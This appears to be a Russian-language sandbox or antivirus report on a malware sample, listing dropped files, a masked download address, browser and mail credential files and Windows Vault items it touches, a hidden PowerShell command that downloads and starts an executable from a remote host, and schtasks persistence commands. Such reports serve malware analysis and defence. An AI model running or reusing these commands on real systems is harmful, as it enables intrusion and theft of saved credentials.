Техническая информация
- <SYSTEM32>\tasks\updates\jirnzoc
- http://19#.#.140.203/ebqtvlxcint3hgg.exe как %appdata%\qtvlxcint3hgg.exe
- qtvlxcint3hgg.exe
- %APPDATA%\opera software\opera stable\login data
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %APPDATA%\thunderbird\profiles.ini
- %APPDATA%\mozilla\firefox\profiles.ini
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\qtvlxcint3hgg.exe
- %APPDATA%\jirnzoc.exe
- %TEMP%\tmpb315.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\tmpb315.tmp
- http://19#.#.140.203/EBqtvlXcINt3HgG.exe
- '%APPDATA%\qtvlxcint3hgg.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#.140.203/EBqtvlXcINt3HgG.exe','%APPDATA%\qtvlXcINt3HgG.exe');Star...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\Jirnzoc" /XML "%TEMP%\tmpB315.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\Jirnzoc" /XML "%TEMP%\tmpB315.tmp"